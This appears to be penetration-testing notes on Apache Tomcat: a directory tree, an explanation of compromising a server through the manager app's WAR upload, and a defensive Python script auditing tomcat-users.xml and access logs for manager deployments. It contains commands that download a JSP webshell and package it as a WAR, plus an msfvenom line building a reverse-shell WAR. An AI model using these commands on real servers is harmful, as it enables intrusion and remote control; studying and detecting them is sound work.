Apache Tomcat is an open-source web server that hosts applications written in Java.
/opt/tomcat/ (Tomcat installation directory)
├── bin/ (Startup, shutdown, and management scripts)
│   ├── catalina.sh (Main control script for Tomcat)
│   ├── startup.sh (Starts Tomcat)
│   ├── shutdown.sh (Stops Tomcat)
│   ├── setenv.sh (Optional, sets environment variables)
│   ├── digest.sh (Generates hashed passwords)
│   ├── version.sh (Shows Tomcat version)
│   ├── tool-wrapper.sh (Helper script for Java tools)
│   ├── tomcat-juli.jar (Tomcat logging utility)
│   └── *.bat (Windows equivalents of the shell scripts)
├── conf/ (Configuration files)
│   ├── server.xml (Main configuration file)
│   ├── web.xml (Default web application settings)
│   ├── tomcat-users.xml (User roles and authentication)
│   ├── tomcat-users.xsd (XML schema definition for tomcat-users.xml)
│   ├── logging.properties (Logging configuration)
│   ├── catalina.policy (Security policy for Java permissions)
│   ├── catalina.properties (JVM properties)
│   ├── context.xml (Default context settings)
│   ├── jaspic-providers.xml (Java Authentication configuration)
│   └── jaas.config (Java Authentication and Authorization Service)
├── lib/ (Core Tomcat libraries)
│   ├── servlet-api.jar (Servlet API)
│   ├── tomcat-api.jar (Tomcat core API)
│   ├── tomcat-util.jar (Utility classes)
│   ├── ecj-*.jar (Eclipse Compiler for JSP)
│   ├── jsp-api.jar (JSP API)
│   ├── websocket-api.jar (WebSocket API)
│   └── *.jar (Additional dependencies)
├── logs/ (Log files)
│   ├── catalina.out (Main log file)
│   ├── localhost.log (Logs specific to the localhost container)
│   ├── manager.log (Logs for the Tomcat Manager application)
│   ├── host-manager.log (Logs for the Host Manager application)
│   └── *.log (Other logs)
├── temp/ (Temporary files)
│   └── tomcat.* (Temporary data storage for Tomcat)
├── webapps/ (Deployed applications)
│   ├── ROOT/ (Default root application)
│   │   ├── index.jsp (Default welcome page)
│   │   └── WEB-INF/ (Configuration files for the app)
│   ├── manager/ (Tomcat Manager Web UI)
│   │   ├── images/ (Icons and graphics for the UI)
│   │   ├── META-INF/ (Metadata and security settings)
│   │   └── WEB-INF/ (Application configurations)
│   │       └── web.xml (Defines servlet settings for the Manager app)
│   ├── host-manager/ (Tomcat Virtual Host Manager)
│   ├── docs/ (Tomcat documentation)
│   ├── examples/ (Example applications)
│   ├── myapp.war (Custom deployed application, packaged as a .war file)
│   └── <CUSTOMAPP>/ (Custom web application)
│       ├── images/ (Custom app images)
│       ├── index.jsp (Main entry point of the app)
│       ├── META-INF/
│       │   └── context.xml (Application-specific context configuration)
│       ├── status.xsd (XML schema for status validation)
│       └── WEB-INF/
│           ├── jsp/
│           │   └── admin.jsp (Admin page JSP)
│           ├── lib/
│           │   └── jdbc_drivers.jar (Database driver)
│           ├── classes/
│           │   └── AdminServlet.class (Compiled servlet for the admin page)
│           └── web.xml (Defines servlet settings for the custom app)
├── work/ (Compiled JSP files and runtime data)
│   └── Catalina/ (Compiled Java files for JSPs)
│       └── localhost/
│           ├── _ (Default webapp compilation)
│           └── myapp/ (Compiled JSPs for a deployed application)
├── LICENSE (License information)
├── NOTICE (Legal notices)
└── RELEASE-NOTES (Release notes)
Many Tomcat installations expose a web GUI for managing deployed applications. By default it is available at /manager/html, and only users assigned the manager-gui role are allowed to access it. Valid manager credentials can be used to upload a packaged Tomcat application (a .WAR file) and thereby compromise the server. A WAR, or Web Application Archive, packages a web application so it can be deployed quickly, and it is also used for backups.
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > backup.war
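The defender's counterpart to the manager-upload path above, as an added example that is not part of the original notes: a Python script that audits conf/tomcat-users.xml for accounts holding manager roles with plaintext (undigested) passwords, and scans Tomcat access-log lines for successful WAR deployments through the manager endpoints and for repeated 401s against /manager. The tomcat-users.xml content, the log lines and the IP addresses are constructed samples; the default AccessLogValve "common" pattern and the manager endpoint paths are real Tomcat conventions, while the digest shape check (salt$iterations$hex, as written by bin/digest.sh) is an assumption about how the credentials were generated.

```python
import re
import xml.etree.ElementTree as ET

# Tomcat roles that grant control over deployed applications or the container.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}

# Assumption: salted digests from bin/digest.sh look like "<salt>$<iterations>$<hex>".
# Anything that does not match is treated as a plaintext password.
DIGEST_RE = re.compile(r"^[0-9a-fA-F]+\$\d+\$[0-9a-fA-F]+$")

# Constructed sample of conf/tomcat-users.xml (not from any real installation).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="viewer"/>
  <user username="tomcat" password="changeme" roles="manager-gui,manager-script"/>
  <user username="ops" password="9f86d081884c7d659a2feaa0c55ad015$100000$a3f1c2d4e5b6a7f8091a2b3c4d5e6f708192a3b4c5d6e7f8091a2b3c4d5e6f70" roles="manager-gui"/>
  <user username="reader" password="readonly" roles="viewer"/>
</tomcat-users>
"""

# Matches the default AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager requests that deploy a WAR: the HTML form upload and the text-interface deploy.
DEPLOY_ENDPOINTS = {("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy")}

# Constructed access-log sample (TEST-NET addresses, invented timestamps).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Mar/2024:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - - [12/Mar/2024:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.7 - tomcat [12/Mar/2024:10:15:09 +0000] "GET /manager/html HTTP/1.1" 200 19331
203.0.113.7 - tomcat [12/Mar/2024:10:15:31 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABCD HTTP/1.1" 200 19844
198.51.100.4 - deploy [12/Mar/2024:11:02:10 +0000] "PUT /manager/text/deploy?path=/backup&update=true HTTP/1.1" 200 48
10.0.0.12 - - [12/Mar/2024:11:05:44 +0000] "GET /myapp/index.jsp HTTP/1.1" 200 1120
"""


def audit_tomcat_users(xml_text):
    """Return one finding per account that holds a privileged role, recording
    whether its password is stored in plaintext rather than as a digest."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        # Strip the XML namespace so the tag compares as plain "user".
        if elem.tag.split("}")[-1] != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        held = sorted(roles & PRIVILEGED_ROLES)
        if not held:
            continue
        findings.append({
            "username": elem.get("username"),
            "privileged_roles": held,
            "plaintext_password": DIGEST_RE.match(elem.get("password", "")) is None,
        })
    return findings


def find_manager_activity(log_lines, failure_threshold=3):
    """Flag successful WAR deployments via the manager app and hosts that hit
    /manager with at least `failure_threshold` 401 responses."""
    deployments, failures = [], {}
    for line in log_lines:
        m = ACCESS_RE.match(line.strip())
        if not m:
            continue  # not in the expected access-log shape; skip rather than guess
        path = m["path"].split("?", 1)[0]  # drop the query string before matching
        status = int(m["status"])
        if path.startswith("/manager/") and status == 401:
            failures[m["host"]] = failures.get(m["host"], 0) + 1
        if (m["method"], path) in DEPLOY_ENDPOINTS and 200 <= status < 300:
            deployments.append({"host": m["host"], "user": m["user"], "time": m["time"],
                                "method": m["method"], "path": path})
    repeated = {h: n for h, n in failures.items() if n >= failure_threshold}
    return {"deployments": deployments, "repeated_auth_failures": repeated}


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        flag = "PLAINTEXT" if f["plaintext_password"] else "digested"
        print(f"user {f['username']}: roles {f['privileged_roles']} password {flag}")
    report = find_manager_activity(SAMPLE_ACCESS_LOG.splitlines())
    for d in report["deployments"]:
        print(f"deployment by {d['user']} from {d['host']} at {d['time']}: {d['method']} {d['path']}")
    print("repeated manager auth failures:", report["repeated_auth_failures"])
```

Run against a real installation by reading conf/tomcat-users.xml and the access log from logs/ instead of the embedded samples. The access-log check only works if an AccessLogValve is enabled in server.xml with a pattern that records the request line and status; manager.log records the deploy itself but not the client's earlier failed attempts.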